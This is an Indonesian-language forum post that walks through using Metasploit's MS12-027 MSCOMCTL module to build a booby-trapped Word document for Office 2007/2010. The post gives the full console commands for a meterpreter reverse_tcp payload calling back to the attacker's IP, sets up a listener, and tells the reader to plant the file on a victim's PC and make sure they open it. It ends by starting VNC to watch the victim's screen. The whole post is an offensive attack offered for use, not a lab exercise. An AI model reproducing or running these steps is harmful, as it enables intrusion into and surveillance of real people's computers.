[Share] Metasploit Dengan Word MS12 027 MSCOMCTL
#1
hallo bro, ini thread pertama ane semoga aja ga double post dan dapet free email @ibt.or.id #ngarep hehe..

Targets

MS office 2007 on windows XP SP 3
MS office 2010 on windows 7/SP1

Requirement

Attacker: kali
Victim PC: Windows XP

Open terminal ketik msfconsole
lalu ketik lagi di msfnya:

use exploit/windows/fileformat/ms12_027_mscomctl_bof
msf exploit (ms12_027_mscomctl_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms12_027_mscomctl_bof)>set lhost 10.72.56.24 (IP Attacker)
msf exploit (ms12_027_mscomctl_bof)>exploit

[Image: Screenshot_5.png]

Setelah berhasil menghasilkan doc file, itu disimpan di /root/.msf4/local/msf.doc

ketik lagi di msfnya:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.72.56.24 (IP Attacker)
exploit

nah,ini tahap yg paling susah.
anda harus taruh backdoor itu di PC korban.. dan pastikan korban membuka file doc kita.

penampakan setelah korban membuka..

[Image: Screenshot_7.png]

oke kita coba liat aksi dari si korban.

ketik: run vnc -p 4545

[Image: Screenshot_9.png]

sekian dan terima kasih, semoga bermanfaat.


Messages In This Thread
Metasploit Dengan Word MS12 027 MSCOMCTL - by Creed - 05-08-2015, 06:22 AM




Users browsing this thread: 1 Guest(s)